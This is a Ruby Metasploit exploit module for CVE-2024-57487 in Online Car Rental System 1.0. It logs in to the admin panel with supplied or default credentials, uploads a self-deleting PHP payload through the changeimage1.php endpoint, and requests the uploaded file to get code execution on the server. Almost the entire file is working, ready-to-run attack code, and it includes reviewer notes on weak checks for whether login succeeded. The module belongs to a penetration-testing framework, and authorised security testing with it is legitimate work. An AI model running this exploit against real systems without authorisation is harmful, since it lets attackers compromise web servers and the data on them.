Path: blob/master/modules/exploits/multi/http/carrental_fileupload_rce.rb
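##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Authenticated file-upload RCE in Online Car Rental System 1.0
  # (CVE-2024-57487). The chain is: log in to admin/, POST a PHP file to
  # admin/changeimage1.php, then GET it back from admin/img/vehicleimages/.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Car Rental System 1.0 File Upload RCE (Authenticated)',
        'Description' => %q{
          This module exploits an authenticated remote code execution vulnerability in the
          Online Car Rental System 1.0 via the `changeimage1.php` endpoint. An authenticated
          attacker can upload malicious PHP scripts without proper validation, enabling
          arbitrary code execution on the server.
        },
        'Author' => ['Aaryan Golatkar'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-57487'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-57487'],
        ],
        'DisclosureDate' => '2025-01-13',
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Privileged' => false,
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # The uploaded .php removes itself when it runs (see upload_shell),
          # but it still exists on disk until the trigger request is made.
          # NOTE(review): the upload goes through the application's
          # image-change handler, which may also alter an application record
          # pointing at the file — confirm and add CONFIG_CHANGES if so.
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path to Online Car Rental System', '/']),
        OptString.new('USERNAME', [true, 'The admin username', 'admin']),
        OptString.new('PASSWORD', [true, 'The admin password', 'Test@12345']),
      ]
    )
  end

  # Fingerprints the target by fetching the admin login page.
  #
  # @return [CheckCode] Unknown when admin/ is unreachable or does not answer
  #   HTTP 200, Detected when the page contains 'Car Rental Portal', Safe
  #   otherwise. The marker only shows the product is present, not that it
  #   is the vulnerable 1.0 release, hence Detected rather than Appears.
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'admin/'))
    return CheckCode::Unknown('Failed to access the target.') unless res&.code == 200

    if res.body.to_s.include?('Car Rental Portal')
      return CheckCode::Detected('The target appears to be the Online Car Rental System.')
    end

    CheckCode::Safe('Online Car Rental System not detected')
  end

  # Authenticates to the admin panel with USERNAME/PASSWORD and keeps the
  # session cookie for the following requests.
  #
  # @raise [Msf::Exploit::Failed] (Failure::NoAccess) unless the reply is
  #   HTTP 200 carrying a PHPSESSID cookie.
  #
  # NOTE(review): PHP applications usually issue PHPSESSID from
  # session_start() before the credentials are checked, so "200 + session
  # cookie" does not by itself prove the login succeeded — with wrong
  # credentials this method can report success and the failure only shows
  # up at the upload step. If a post-login marker for this application
  # (e.g. a redirect to the dashboard) is confirmed, test for it here.
  def login
    print_status('Attempting to authenticate...')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin/'),
      'method' => 'POST',
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        'login' => '' # submit button; presumably the handler keys on its presence
      },
      'keep_cookies' => true # store PHPSESSID in the module cookie jar
    )

    authenticated = res&.code == 200 && res.get_cookies.include?('PHPSESSID')
    fail_with(Failure::NoAccess, 'Failed to authenticate with the target.') unless authenticated

    print_good('Authentication successful.')
  end

  # Uploads the PHP payload through the vulnerable image-change endpoint.
  #
  # The multipart field names (img1, update) and the imgid query parameter
  # mirror the application's change-image form; imgid is fixed to 1.
  # NOTE(review): presumably imgid selects an existing vehicle record —
  # whether the upload still succeeds when record 1 is absent is not known
  # from this module; confirm before relying on it.
  #
  # @return [String] the random basename the payload was stored under.
  # @raise [Msf::Exploit::Failed] (Failure::UnexpectedReply) on a non-200
  #   reply. A 200 is taken as success: the file cannot be probed beforehand
  #   because the first GET both runs and unlinks it.
  def upload_shell
    payload_name = "#{Rex::Text.rand_text_alphanumeric(5)}.php"
    # unlink_self: the stub deletes itself as it runs, limiting what is left
    # on disk after the trigger request.
    payload = get_write_exec_payload(unlink_self: true)

    print_status("Uploading payload as #{payload_name}...")

    form = Rex::MIME::Message.new
    form.add_part(payload, 'application/x-php', nil, "form-data; name=\"img1\"; filename=\"#{payload_name}\"")
    form.add_part('', nil, nil, 'form-data; name="update"')

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin/changeimage1.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'vars_get' => { imgid: '1' },
      'data' => form.to_s
    )

    fail_with(Failure::UnexpectedReply, 'Failed to upload payload.') unless res&.code == 200

    print_good('Payload uploaded successfully.')
    payload_name
  end

  # Runs the full chain: authenticate, upload the payload, request it.
  #
  # The trigger GET uses a short explicit read timeout (5 s) rather than the
  # HttpClient default: once the uploaded PHP hands control to the payload
  # the HTTP response typically does not return until the payload exits, so
  # waiting on it only delays the module. The response is deliberately not
  # inspected; the session handler reports success.
  def exploit
    login
    payload_name = upload_shell
    payload_url = normalize_uri(target_uri.path, "admin/img/vehicleimages/#{payload_name}")

    print_status("Executing payload at #{payload_url}...")
    send_request_cgi(
      {
        'uri' => payload_url,
        'method' => 'GET'
      },
      5
    )
  end
end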